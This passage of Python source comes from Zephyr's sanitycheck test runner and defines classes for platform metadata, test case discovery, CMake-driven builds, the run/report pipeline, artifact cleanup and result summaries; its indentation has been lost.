for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
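    # Scan a C source file for ztest_test_suite()/ztest_*unit_test() macros
    # and return the discovered sub-test names plus any warnings.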
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
            # Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
        # On Windows we only support building for now; running tests is still
        # work in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
        self.run = runnable and not _build_only
        self.build_only = not self.run
return
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
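    # Pipeline state machine for a single instance: "cmake" -> "build" ->
    # "run" -> "report" -> optional "cleanup".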
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
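    # Delete build artifacts, keeping only a small whitelist of logs and the
    # generated .config; symlinked or empty directories are removed as well.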
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
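    # Print the per-instance result (or update the single progress line in
    # non-verbose mode) and bump the suite counters.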
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
self.suite.total_passed += 1
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
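    # Compare ram_size/rom_size of the current run against a previously saved
    # CSV report and return the list of deltas.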
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
            if instance.metrics.get("handler_time"):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
